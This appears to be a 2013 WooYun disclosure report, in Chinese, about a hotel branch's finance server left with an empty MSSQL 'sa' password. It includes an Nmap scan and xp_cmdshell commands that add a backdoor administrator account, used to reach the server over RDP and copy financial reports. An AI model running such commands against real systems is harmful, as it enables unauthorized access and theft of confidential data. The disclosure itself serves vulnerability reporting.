漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-020513
漏洞标题:汉庭分店财务系统默认密码漏洞
相关厂商:汉庭酒店
漏洞作者: bt0sea
提交时间:2013-03-23 11:29
修复时间:2013-06-21 11:30
公开时间:2013-06-21 11:30
漏洞类型:默认配置不当
危害等级:中
自评Rank:6
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-03-23: 细节已通知厂商并且等待厂商处理中
2013-03-25: 厂商已经确认,细节仅向厂商公开
2013-03-28: 细节向第三方安全合作伙伴开放
2013-05-19: 细节向核心白帽子及相关领域专家公开
2013-05-29: 细节向普通白帽子公开
2013-06-08: 细节向实习白帽子公开
2013-06-21: 细节向公众公开
简要描述:
汉庭酒店分店财务系统,根据总店的要求,需要自己提供财务系统,那么加盟的用户为了快速建立财务系统,一般都使用的是用友等初级的财务软件,那么,由于财务人员对计算机安全知识的缺乏,会造成默认配置不当。
详细说明:
汉庭酒店分店财务系统,根据总店的要求,需要自己提供财务系统,那么加盟的用户为了快速建立财务系统,一般都使用的是用友等初级的财务软件,那么,由于财务人员对计算机安全知识的缺乏,会造成默认配置不当。
本地安装MSSQL 2000 默认密码为空,通过xp_cmdshell添加管理员用户密码,3389登入。下载了财务报表。
漏洞证明:
Nmap scan report for 192.168.50.251
Host is up (0.00081s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1026/tcp open LSA-or-nterm
1033/tcp open netinfo
1041/tcp open danf-ak2
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
8089/tcp open unknown
MAC Address: 1C:6F:65:E0:DF:A8 (Giga-byte Technology Co.)
3.1.1. TDS (SQL Server) access with sa and no password (tds-generic-0001)
Description:
TDS servers such as Microsoft SQL Server and Sybase create a default administrative account with the user ID "sa" and password "". It is best practice to remove default accounts, if possible. For accounts required by the system, the default password should be changed. This account often grants full access to the system.
通过symantec CCSVM扫描发现SA 空密码
本来想从数据库用户密码进入,不过发现密码并非通用加密方式MD5 base64 凯撒密码等只能通过sa 加管理员账号
新建查询
use master;
xp_cmdshell 'net user test test /add'
xp_cmdshell 'net localgroup administrators test /add'
财务系统最终没有进去,但是在本地硬盘上找到了很多重要的财务报表
修复方案:
MSSQL设置强悍的密码。
版权声明:转载请注明来源 bt0sea@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2013-03-25 09:50
厂商回复:
感谢漏洞提交,已联络相关门店进行确认改善。
最新状态:
暂无